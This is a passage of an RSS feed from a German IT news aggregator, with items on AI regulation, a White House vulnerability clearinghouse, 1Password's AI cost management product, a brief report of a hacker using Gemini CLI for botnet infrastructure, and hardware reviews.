<p>Die gesparten Kilos auf dem Rücken rechtfertigen den kleineren Bildschirm allemal. Wer einen soliden Rechner für das Homeoffice sucht, nur selten verreist und beim Kauf auf das Budget achten muss, macht mit dem klassischen <strong>15-Zöller</strong> nichts falsch.</p>



<p>Wenn für Sie das Notebook jedoch den klobigen Desktop-PC unter dem Schreibtisch komplett ersetzen soll, Sie professionell Videos schneiden oder aktuelle AAA-Spiele flüssig spielen wollen, führt kein Weg am <strong>16-Zoll-Kraftpaket</strong> vorbei. Die massive Arbeitsfläche und das hervorragende Kühlpotenzial gleichen das stattliche Transportgewicht in diesem Fall problemlos auf.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are ...]]></description>
<link>https://tsecurity.de/de/3670804/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670804/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</guid>
<pubDate>Wed, 15 Jul 2026 15:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are based on an analysis of Gemini CLI session logs spanning March 19 through April 21, […]</p>
<p>The post <a href="https://gbhackers.com/gemini-cli-to-deploy-c2-botnet/">Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rechtsgutachten: KI-Suchmaschinen und KI-Chatbots unter­lie­gen Medien­recht]]></title>
<description><![CDATA[Die Kommission für Zulassung und Aufsicht (ZAK) kommt in einem Rechtsgutachten zu dem Schluss, dass sowohl KI-Suchmaschinen als auch entsprechende Chatbots unter das deutsche Medienrecht fallen. Für Googles AI Overviews und den KI-Chatbot Perplexity hat dies nun unmittelbare Konsequenzen: Erste B...]]></description>
<link>https://tsecurity.de/de/3670802/it-nachrichten/rechtsgutachten-ki-suchmaschinen-und-ki-chatbots-unterliegen-medienrecht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670802/it-nachrichten/rechtsgutachten-ki-suchmaschinen-und-ki-chatbots-unterliegen-medienrecht/</guid>
<pubDate>Wed, 15 Jul 2026 15:18:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/7/9/4-1dde74f01dd9fa03/article-640x360.17fb966d.jpg"><p>Die Kommission für Zulassung und Aufsicht (ZAK) kommt in einem Rechtsgutachten zu dem Schluss, dass sowohl KI-Suchmaschinen als auch entsprechende Chatbots unter das deutsche Medienrecht fallen. Für Googles AI Overviews und den KI-Chatbot Perplexity hat dies nun unmittelbare Konsequenzen: Erste Bescheide wurden bereits erlassen.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[White House launches AI-driven vulnerability clearinghouse to speed cyber remediation]]></title>
<description><![CDATA[The White House is expanding the use of AI beyond cyber threat detection into vulnerability management, launching a new program that aims to help government agencies and critical infrastructure operators identify, prioritize, and remediate software vulnerabilities faster.



Called Gold Eagle, th...]]></description>
<link>https://tsecurity.de/de/3670755/it-security-nachrichten/white-house-launches-ai-driven-vulnerability-clearinghouse-to-speed-cyber-remediation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670755/it-security-nachrichten/white-house-launches-ai-driven-vulnerability-clearinghouse-to-speed-cyber-remediation/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The White House is expanding the use of AI beyond cyber threat detection into vulnerability management, launching a new program that aims to help government agencies and critical infrastructure operators identify, prioritize, and remediate software vulnerabilities faster.</p>



<p class="wp-block-paragraph">Called Gold Eagle, the initiative will act as a centralized clearinghouse for cybersecurity vulnerabilities, coordinating vulnerability reporting, verification, and remediation across federal agencies, open-source software communities, and operators of critical infrastructure, the <a href="https://www.whitehouse.gov/releases/2026/07/white-house-launches-gold-eagle-initiative-for-unprecedented-cybersecurity-vulnerability-coordination/" target="_blank" rel="noreferrer noopener">White House said in a statement</a>.</p>



<p class="wp-block-paragraph">“This new model will leverage frontier AI capabilities to continue advancing faster than adversaries, reduce duplicative scanning efforts, and deliver prioritized and actionable threat and remediation information to defenders across the Federal government and the private sector,” the statement added.</p>



<p class="wp-block-paragraph">The initiative stems from President Donald Trump’s <a href="https://www.csoonline.com/article/4180205/trump-revives-parts-of-canceled-ai-order-with-cybersecurity-focused-directive.html?utm=hybrid_search">June 2 executive order</a> on advanced AI innovation and security, which directed federal agencies to expand the use of frontier AI to strengthen cybersecurity while working more closely with the private sector.</p>



<p class="wp-block-paragraph">The administration said the program has already begun receiving vulnerability reports from multiple industries and coordinating validation and remediation efforts.</p>



<p class="wp-block-paragraph">For enterprise security leaders, the announcement signals a government effort to move beyond traditional vulnerability disclosure toward coordinated vulnerability response.</p>



<h2 class="wp-block-heading">A move toward coordinated vulnerability response</h2>



<p class="wp-block-paragraph">Prabhjyot Kaur, senior analyst at Everest Group, said Gold Eagle should be viewed as “a significant evolution” of existing vulnerability disclosure and government-industry coordination mechanisms rather than a replacement for them.</p>



<p class="wp-block-paragraph">“Its potential significance lies in creating a more operational clearinghouse that can consolidate vulnerability findings, reduce duplicative scanning, validate exposure across sectors, and coordinate remediation with critical infrastructure operators and open-source software communities,” Kaur said.</p>



<p class="wp-block-paragraph">The more meaningful shift, she said, is from largely distributed vulnerability disclosure processes toward centralized prioritization and coordinated action. Whether the initiative changes enterprise vulnerability management, however, will depend on execution, including industry participation, information-sharing protocols, and whether it can shorten the time between vulnerability discovery, validation, and remediation.</p>



<p class="wp-block-paragraph">The White House said Gold Eagle has already begun receiving and prioritizing vulnerability reports from multiple industries, coordinating scanning verification, and supporting remediation efforts using existing federal authorities and resources.</p>



<h2 class="wp-block-heading">AI can accelerate prioritization, not replace judgment</h2>



<p class="wp-block-paragraph">The administration said the initiative is designed to help government and industry reduce duplicative vulnerability scanning and accelerate remediation by using AI to prioritize findings.</p>



<p class="wp-block-paragraph">Treasury Secretary Scott Bessent said the program reflects closer collaboration between the government and the private sector to protect financial institutions and other critical infrastructure.</p>



<p class="wp-block-paragraph">“Treasury, along with our partner agencies, will continue to harness frontier AI capabilities to stay ahead of our adversaries and defend the American people from emerging threats,” Bessent said in the statement.</p>



<p class="wp-block-paragraph">Kaur said AI is likely to deliver the greatest value in vulnerability triage and prioritization.</p>



<p class="wp-block-paragraph">“It can correlate findings from multiple scanners, remove duplicate alerts, link vulnerabilities to known exploitation activity, assess internet exposure, and combine technical severity with asset criticality and potential business impact,” she said.</p>



<p class="wp-block-paragraph">However, she cautioned that AI-generated prioritization is only as reliable as the underlying asset inventories, vulnerability data, and threat intelligence.</p>



<p class="wp-block-paragraph">“AI should therefore support, rather than replace, human validation, compensating-control analysis, and enterprise-specific risk decisions,” she said.</p>



<p class="wp-block-paragraph">Apeksha Kaushik, senior principal analyst at Gartner, said the initiative reflects a broader shift toward measuring cybersecurity performance by reducing actual risk exposure rather than simply increasing patch counts.</p>



<p class="wp-block-paragraph">By helping unify and accelerate vulnerability coordination between government and industry, the initiative could address long-standing challenges around fragmented reporting and inconsistent disclosure practices, enabling enterprises to respond more quickly and efficiently to vulnerabilities, she said.</p>



<h2 class="wp-block-heading">Execution will determine enterprise impact</h2>



<p class="wp-block-paragraph">The announcement outlines Gold Eagle’s objectives but provides few operational details about how organizations will participate, how AI will validate or prioritize vulnerabilities, or how the initiative will work alongside existing coordinated vulnerability disclosure and vulnerability management programs.</p>



<p class="wp-block-paragraph">Kaur said CISOs should view the initiative as an additional source of vulnerability intelligence rather than a replacement for enterprise risk management.</p>



<p class="wp-block-paragraph">“The biggest takeaway is that vulnerability response is moving toward faster, more intelligence-led, and more coordinated prioritization across government and industry,” she said.</p>



<p class="wp-block-paragraph">Even if government coordination improves the quality and timeliness of vulnerability intelligence, enterprises will continue to own remediation decisions, Kaur added. “Government coordination may improve the quality and timeliness of intelligence, but enterprise context must continue to determine the final remediation priority.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Medienaufsicht: Medienrecht gilt auch für KI-Suchmaschinen]]></title>
<description><![CDATA[Die Landesmedienanstalten stufen KI-Generierungen als eigene Inhalte ein. Auf Google und Perplexity wartet Regulierung. (KI, Google)]]></description>
<link>https://tsecurity.de/de/3669741/it-nachrichten/medienaufsicht-medienrecht-gilt-auch-fuer-ki-suchmaschinen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669741/it-nachrichten/medienaufsicht-medienrecht-gilt-auch-fuer-ki-suchmaschinen/</guid>
<pubDate>Wed, 15 Jul 2026 08:32:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Landesmedienanstalten stufen KI-Generierungen als eigene Inhalte ein. Auf Google und Perplexity wartet Regulierung. (<a href="https://www.golem.de/specials/ki/">KI</a>, <a href="https://www.golem.de/specials/google/">Google</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=210875&amp;page=1&amp;ts=1784096522" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4683: Recording the hallway track]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


Recording Kit


General




Lanyard - HPR - Your Name 


HPR Business Cards - Your email address


HPR Stickers


Pen


A6 Notebook


Android Mobile phone 
OpenCamera






Zoom H2






Zoom H2 Handy Recorder




Set format to be...]]></description>
<link>https://tsecurity.de/de/3669312/podcasts/hpr4683-recording-the-hallway-track/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669312/podcasts/hpr4683-recording-the-hallway-track/</guid>
<pubDate>Wed, 15 Jul 2026 02:02:54 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<h2>
Recording Kit</h2>

<h3>
General</h3>

<ul>

<li>
Lanyard - HPR - Your Name </li>

<li>
HPR Business Cards - Your email address</li>

<li>
HPR Stickers</li>

<li>
Pen</li>

<li>
A6 Notebook</li>

<li>
Android Mobile phone <a href="https://sourceforge.net/projects/opencamera/" rel="noopener noreferrer" target="_blank">
OpenCamera</a>

</li>

</ul>

<h3>
Zoom H2</h3>

<ul>

<li>

<a href="https://en.wikipedia.org/wiki/Zoom_H2_Handy_Recorder" rel="noopener noreferrer" target="_blank">
Zoom H2 Handy Recorder</a>

</li>

<li>
Set format to best and date format to ISO8601</li>

<li>
Replacement Batteries</li>

<li>
Micro USB Cable</li>

<li>
2.5 mm headphones</li>

<li>
3.5 mm Male to Male cable</li>

<li>
3.5 mm earbuds</li>

</ul>

<h3>
Backup 1</h3>

<ul>

<li>

<a href="https://en.wikipedia.org/wiki/SanDisk_portable_media_players#Sansa_Clip" rel="noopener noreferrer" target="_blank">
Sansa Clip</a>

</li>

<li>

<a href="https://en.wikipedia.org/wiki/Rockbox" rel="noopener noreferrer" target="_blank">
Rockbox</a>

</li>

<li>
Remove before flight key fob</li>

<li>
Set format to best and date format to ISO8601</li>

</ul>

<h3>
Backup 2</h3>

<ul>

<li>
Android Mobile phone <a href="https://github.com/Dimowner/AudioRecorder" rel="noopener noreferrer" target="_blank">
AudioRecorder</a>

</li>

<li>
Set format to best and date format to ISO8601</li>

</ul>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4683/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bosgame’s P6 Ryzen 9 mini PC deal undercuts 8-core rivals as a powerful $520 desktop replacement]]></title>
<description><![CDATA[AMD Ryzen 9 6900HX (8-core/16-thread), 24GB LPDDR5X RAM, 1TB PCIe 4.0 SSD, dual Gigabit LAN, and triple 4K display support]]></description>
<link>https://tsecurity.de/de/3668858/it-nachrichten/bosgames-p6-ryzen-9-mini-pc-deal-undercuts-8-core-rivals-as-a-powerful-520-desktop-replacement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668858/it-nachrichten/bosgames-p6-ryzen-9-mini-pc-deal-undercuts-8-core-rivals-as-a-powerful-520-desktop-replacement/</guid>
<pubDate>Tue, 14 Jul 2026 20:19:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AMD Ryzen 9 6900HX (8-core/16-thread), 24GB LPDDR5X RAM, 1TB PCIe 4.0 SSD, dual Gigabit LAN, and triple 4K display support]]></content:encoded>
</item>
<item>
<title><![CDATA[Bescheid für Google und Perplexity: Medienwächter gehen gegen KI-Übersichten vor]]></title>
<description><![CDATA[Die Medienanstalten stufen KI-generierte Antworten als eigene Inhalte ein und fordern Transparenz. Das DSA-Haftungsprivileg greift hier laut Gutachtern nicht.]]></description>
<link>https://tsecurity.de/de/3668647/it-nachrichten/bescheid-fuer-google-und-perplexity-medienwaechter-gehen-gegen-ki-uebersichten-vor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668647/it-nachrichten/bescheid-fuer-google-und-perplexity-medienwaechter-gehen-gegen-ki-uebersichten-vor/</guid>
<pubDate>Tue, 14 Jul 2026 18:25:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Medienanstalten stufen KI-generierte Antworten als eigene Inhalte ein und fordern Transparenz. Das DSA-Haftungsprivileg greift hier laut Gutachtern nicht.]]></content:encoded>
</item>
<item>
<title><![CDATA[1Password moves into AI cost management, betting that token spend is the next enterprise budget crisis]]></title>
<description><![CDATA[1Password on Tuesday launched AI Spend and Consumption Management, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including Anthropic, Cursor, and OpenAI.The ...]]></description>
<link>https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://1password.com/">1Password</a> on Tuesday launched <a href="https://1password.com/product/saas-manager">AI Spend and Consumption Management</a>, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a>.</p><p>The move marks the latest strategic expansion for a company that built its reputation on password management for consumers and, over the past three years, has aggressively repositioned itself as a broader identity security and SaaS governance platform for enterprise buyers. With this release, 1Password is staking a claim in one of enterprise technology's newest and most chaotic budget categories: the consumption-based cost of large language models.</p><p>"Executives want teams to build faster with AI, but that speed is creating a new kind of spending pressure," Greg Henry, 1Password's chief financial officer, said in an exclusive interview with VentureBeat. "Developers are consuming tokens at a pace that traditional budgets weren't built to manage, and IT and finance teams are being asked to forecast and justify AI investments without a clear view of what's actually driving costs."</p><p>The product, now in public preview with broad availability planned for fall 2026, connects directly to vendor admin APIs to pull token-level consumption data daily. It normalizes that data across providers into a single dashboard and allows organizations to set vendor-level spend limits, configure threshold-based alerts via Slack and email, and break down usage by team, user, vendor, and model.</p><div></div><h2><b>Why traditional software budgets can't keep up with AI token pricing</b></h2><p>The core challenge <a href="https://1password.com/">1Password</a> is targeting is structural. Traditional SaaS pricing operates on a per-seat, per-year model that is easy to budget and reconcile. AI pricing does not. Every API call to <a href="https://claude.ai/">Claude</a>, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, or a <a href="https://cursor.com/docs/api">Cursor-powered coding assistant</a> consumes tokens, and the cost of those tokens varies by model, by input versus output, and by the complexity of the task. A single engineering team running agentic workflows can burn through a prepaid token budget in weeks — and the finance team may not notice until the invoice arrives.</p><p>Henry drew a sharp analogy to a problem enterprises have already lived through once. "Consumption-based pricing isn't new," he said. "We saw it arrive with cloud infrastructure, and it took years to build the tools and disciplines to manage it. AI is the next version of that shift."</p><p>That comparison resonates across the industry. When <a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://azure.microsoft.com/en-us">Microsoft Azure</a>, and <a href="https://cloud.google.com/">Google Cloud</a> popularized consumption-based pricing for compute and storage in the 2010s, enterprises initially lacked the tooling to monitor and optimize their cloud bills. That gap spawned an entire FinOps ecosystem — companies like CloudHealth, Spot.io, and Apptio built multi-billion-dollar businesses helping organizations understand what they were spending on cloud and why. Henry is explicitly betting that AI token spend will follow the same trajectory, and that organizations that fail to build visibility now will end up, as he put it, "paying far more than they needed to, for far longer than they should have."</p><p>The scale of the coming wave lends credibility to that bet. Goldman Sachs has estimated that token consumption from AI agents alone will grow 24 times by 2030, a projection driven by the expectation that autonomous AI systems will increasingly execute multi-step workflows — booking travel, writing and deploying code, managing customer service interactions — that generate vastly more API calls than a human sitting at a chat interface.</p><h2><b>How 1Password's new dashboard tracks every token across Anthropic, Cursor, and OpenAI</b></h2><p>The new capability extends <a href="https://1password.com/product/saas-manager">1Password SaaS Manager</a>'s existing foundation of application discovery, license management, and spend analytics. It is not a standalone product. Existing SaaS Manager customers can activate it by connecting their supported AI vendor API keys, at which point consumption data flows into a dedicated AI Consumption Management dashboard. Henry confirmed that there is no separate product or add-on fee: "AI Spend and Consumption Management is available to all 1Password SaaS Manager customers."</p><p>The system provides four core functions. First, it aggregates token usage and spend across Anthropic, Cursor, and OpenAI into a single, normalized view — eliminating the need to toggle between three separate vendor dashboards with three different reporting formats. Second, it enables budget controls: organizations can set vendor-level spend limits, configure percentage-based thresholds, and receive automated alerts when prepaid balances approach depletion. Third, it disaggregates consumption by team, user, vendor, and model, allowing finance and IT to understand not just how much is being spent, but where and by whom. Fourth, it situates AI spend within the broader SaaS portfolio, helping organizations see how token costs relate to their total software investment.</p><p>Notably, the system captures consumption regardless of whether a human or an AI agent generated it. "Token consumption is captured at the API level regardless of whether a human or an agent is generating it," Henry explained. "Organizations get the total consumption picture, including the spikes that agent loops can create, which can be some of the hardest usage to catch before it becomes a problem."</p><p>That agent-level visibility matters because autonomous AI systems can generate runaway costs in ways that human users typically cannot. An agentic coding assistant stuck in a retry loop, for example, can consume thousands of dollars in tokens in minutes — with no human in the loop to notice. For now, the product alerts but does not enforce. When asked whether 1Password will eventually give organizations the ability to automatically cut off spending when a threshold is crossed, Henry said the company is "actively evaluating" automatic enforcement but emphasized that visibility must come first: "You can't enforce what you can't see."</p><h2><b>The choice of launch partners reveals where enterprise AI budgets are under the most pressure</b></h2><p>The decision to start with <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a> — rather than casting a wider net — reflects where enterprise AI adoption and budget strain are most concentrated right now. Henry said the choice was driven entirely by customer demand. "Anthropic, Cursor, and OpenAI are where we're seeing the highest adoption, and where token consumption can move fast and get ahead of the teams responsible for managing it," he said. The company plans to add additional vendors based on customer demand, API availability, and budget impact, though it has not committed to a specific timeline or vendor list.</p><p>The inclusion of Cursor alongside the two major foundation model providers is telling. <a href="https://cursor.com/">Cursor</a>, an AI-powered code editor that has rapidly gained traction among developers, represents a category of AI tool where consumption is particularly difficult to forecast. Unlike a chatbot interface where a user consciously types a prompt, Cursor integrates AI suggestions directly into the development workflow, generating token consumption continuously as developers write code. That ambient, always-on consumption pattern makes it especially prone to budget overruns.</p><p>Henry also addressed who inside an organization should actually own this problem — and acknowledged that the honest answer right now is no one. "When spend is fragmented across vendor dashboards and finance teams are reconciling it monthly, you're always behind," he said. "AI spend can't be treated as a finance-only or IT-only problem." He noted that the pricing differences between models have become significant enough that the choice of which AI model a team uses is now a meaningful financial decision, one that is pulling CFOs into conversations with IT, product, and engineering leaders "in ways they never had to before."</p><p>Steve May, director of IT at ServiceTrade, a 1Password customer that has been using the capability, said it addressed a concrete planning gap. "Forecasting tools for AI consumption and spend was one of our biggest gaps in planning because we didn't have a reliable way to track it," May said. He added that the visibility has "prevented overages that would have cost far more to fix after the fact."</p><h2><b>Where 1Password fits in the fast-consolidating SaaS management market</b></h2><p>1Password is not the only company racing to solve the AI cost management problem, but the competitive landscape is still fragmented and the category is far from mature.</p><p><a href="https://zylo.com/">Zylo</a>, a SaaS management platform that Gartner has also recognized as a leader in the space, published its <a href="https://zylo.com/news/2026-saas-management-index">2026 SaaS Management Index</a> in January showing that AI-native application spend surged 393% year over year in organizations with more than 10,000 employees and 108% overall. Zylo's data also revealed that ChatGPT has become the most expensed application in enterprise environments, highlighting how AI tools are entering organizations through employee credit cards and expense reports — outside formal procurement and governance workflows. Zylo has added its own token-level cost tracking for AI vendors including Anthropic, OpenAI, Cursor, and Perplexity.</p><p>Meanwhile, according to a comparison published by <a href="https://coommit.com/blog/saas-management-platforms-2026-zylo-vs-vendr-vs-sastrify">Coommit</a> in May, <a href="https://www.vendr.com/">Vendr</a> — which focuses more on SaaS negotiation than discovery — tracks AI tools at the contract level but does not yet offer consumption-level visibility. And the FinOps Foundation reported in its 2026 State of FinOps survey that 98% of organizations now actively manage AI costs, up from just 31% in 2024. The broader SaaS management market is also consolidating rapidly. In May, Deel acquired Sastrify, a German SaaS management vendor, and began folding it into its HR platform — a signal that SaaS management capabilities are increasingly being absorbed into adjacent enterprise platforms rather than remaining standalone products.</p><p>1Password's approach differs from pure-play SaaS management competitors in one important respect: it is building AI cost management on top of an identity security platform, not a FinOps or procurement tool. The company's SaaS Manager product grew out of its 2025 acquisition of Trelica, a UK-based SaaS access management startup whose technology enabled the discovery of unsanctioned applications — so-called shadow IT. As BetaKit reported at the time of that deal, 1Password co-CEO Jeff Shiner described Trelica as "a pioneer in modern SaaS access management" and said the acquisition would accelerate 1Password's Extended Access Management product roadmap by more than a year. CRN noted that Trelica brought more than 300 SaaS integrations to the platform. That identity-first lineage gives 1Password a natural advantage in connecting spend data to specific users and teams — a linkage that matters when the question shifts from "how much are we spending on AI?" to "who is spending it, and is it delivering value?"</p><h2><b>From password manager to platform company: 1Password's $6.8 billion bet on enterprise identity</b></h2><p>The launch raises a question that Henry addressed head-on: whether a company that started as a consumer password manager can credibly compete in enterprise AI cost management.</p><p>"It doesn't feel like a stretch to us. It feels like a natural progression," he said. "For more than 20 years, 1Password has evolved alongside how our customers work. We started by protecting passwords. Then we helped organizations manage secrets, control access, and get visibility into the applications their teams rely on."</p><p>The company's evolution has been rapid. 1Password raised a $620 million Series C in January 2022 led by ICONIQ Growth, <a href="https://news.crunchbase.com/venture/1password-620m-round-cybersecurity-investor/">reaching a $6.8 billion valuation</a> — at the time, the largest funding round ever raised by a Canadian company, according to Crunchbase. The round also attracted celebrity investors including Ryan Reynolds, Scarlett Johansson, and Robert Downey Jr. As of early 2025, BetaKit reported that 1Password had surpassed $250 million in annual recurring revenue, with B2B sales accounting for nearly three-quarters of total revenue and the company claiming to be cash-flow positive.</p><p>In May 2024, 1Password launched <a href="https://1password.com/extended-access-management">Extended Access Management</a>, a platform designed to secure sign-ins across both managed and unmanaged applications and devices. That same year, it acquired Kolide for device trust and, in early 2025, Trelica for SaaS discovery. In June 2026, Gartner named 1Password a Leader in its Magic Quadrant for SaaS Management Platforms. According to 1Password's own blog post on the recognition, its SaaS Manager now supports over 400 integrations and provides visibility into a library of more than 40,000 pre-populated application profiles. Each step has moved the company further from its consumer roots and deeper into enterprise infrastructure. The AI Spend and Consumption Management launch extends that trajectory into financial operations territory — a domain where 1Password will compete not only with SaaS management vendors but potentially with dedicated FinOps platforms and the AI vendors' own billing dashboards.</p><h2><b>Why high AI token consumption doesn't always mean wasted money</b></h2><p>Perhaps the most revealing part of Henry's commentary concerns what organizations should actually do with the consumption data once they have it. He pushed back forcefully against the assumption that high token consumption automatically signals waste.</p><p>"A team burning through tokens may be building something genuinely valuable," he said. "A lower-usage project might not be moving the business forward at all. What matters is whether that consumption is producing enough business value to justify the spend."</p><p>Henry drew a distinction between personal productivity — "having a bot summarize your meeting or draft a quick email" — and genuine business outcomes. "What organizations need to see is where consumption is actually driving revenue, efficiency, or something that moves the needle."</p><p>That framing positions AI Spend and Consumption Management not just as a cost-cutting tool but as a decision-support system for AI investment allocation. If a CFO can see that one engineering team's heavy Claude usage is powering a product feature that drives revenue, while another team's OpenAI spend is funding low-value internal automation, the organization can reallocate budget accordingly rather than imposing across-the-board cuts.</p><p>"When costs rise faster than expected, the instinct is to cut," Henry said. "But most organizations can't yet tell which teams, models, or tools are responsible for the increase, so they end up cutting across the board rather than directing investment toward the AI projects that are actually delivering business value. Blunt cuts on a technology you're counting on for competitive advantage is not a management strategy, it's a missed opportunity."</p><h2><b>The next enterprise budget crisis is already here — and it's priced per token</b></h2><p>The product's current scope — three vendor integrations, alerting but not enforcement — is clearly a starting point. Henry signaled that automatic spend limits are on the roadmap and that additional vendor integrations will follow based on customer demand.</p><p>But the broader trajectory he described suggests 1Password sees this launch as a wedge into a much larger opportunity. "As traditional SaaS products add AI capabilities, their pricing models are going to follow," he said. "Organizations that build visibility and management discipline around consumption now are going to be in a much better position when that happens across the rest of their software portfolio."</p><p>If Henry is right, the chaos currently confined to AI token budgets is not a temporary growing pain but a preview of how all enterprise software will eventually be priced. A decade ago, companies scrambled to understand their cloud bills. Today, they are scrambling to understand their AI bills. The question is whether the organizations building the dashboards this time around can get ahead of the curve — or whether, as Henry warned, they will end up where so many companies ended up with cloud, realizing too late how much they were overpaying, and for how long.</p><p>AI Spend and Consumption Management is <a href="https://1password.com/lp/saas-manager">available now in public preview</a> for 1Password SaaS Manager customers. Broad availability is planned for fall 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Plex Keeps Getting Worse. Is Jellyfin a Decent Replacement?]]></title>
<description><![CDATA[If you want to stream local media, this free and open source media server is just as good as Plex. But if you rely on remote access or live TV, prepare to tinker.]]></description>
<link>https://tsecurity.de/de/3667904/it-nachrichten/plex-keeps-getting-worse-is-jellyfin-a-decent-replacement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667904/it-nachrichten/plex-keeps-getting-worse-is-jellyfin-a-decent-replacement/</guid>
<pubDate>Tue, 14 Jul 2026 14:19:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you want to stream local media, this free and open source media server is just as good as Plex. But if you rely on remote access or live TV, prepare to tinker.]]></content:encoded>
</item>
<item>
<title><![CDATA[Co-existing with AI: why replacement narratives are holding the public sector back]]></title>
<description><![CDATA[Why fears of replacement are preventing public services from embracing AI.]]></description>
<link>https://tsecurity.de/de/3667484/it-nachrichten/co-existing-with-ai-why-replacement-narratives-are-holding-the-public-sector-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667484/it-nachrichten/co-existing-with-ai-why-replacement-narratives-are-holding-the-public-sector-back/</guid>
<pubDate>Tue, 14 Jul 2026 11:49:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Why fears of replacement are preventing public services from embracing AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Surface Laptop 8 review: a quality PC whose trackpad taps you back]]></title>
<description><![CDATA[Snappy performance, long battery life, great keyboard and excellent new haptic touchpad make the best of Windows 11Microsoft’s Surface laptop for consumers is back, faster and with longer battery life and a hefty price increase because of the high cost of memory and chips.The Surface Laptop 8 is ...]]></description>
<link>https://tsecurity.de/de/3667004/it-nachrichten/microsoft-surface-laptop-8-review-a-quality-pc-whose-trackpad-taps-you-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667004/it-nachrichten/microsoft-surface-laptop-8-review-a-quality-pc-whose-trackpad-taps-you-back/</guid>
<pubDate>Tue, 14 Jul 2026 08:18:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Snappy performance, long battery life, great keyboard and excellent new haptic touchpad make the best of Windows 11</p><p>Microsoft’s Surface laptop for consumers is back, faster and with longer battery life and a hefty price increase because of the high cost of memory and chips.</p><p>The Surface Laptop 8 is a straight replacement for the seventh edition from 2024, which was the first of Microsoft’s new generation of ARM-based, Qualcomm-powered PCs designed to better rival Apple’s MacBook Air and other thin and light machines.</p> <a href="https://www.theguardian.com/technology/2026/jul/14/microsoft-surface-laptop-8-review">Continue reading...</a>]]></content:encoded>
</item>
<item>
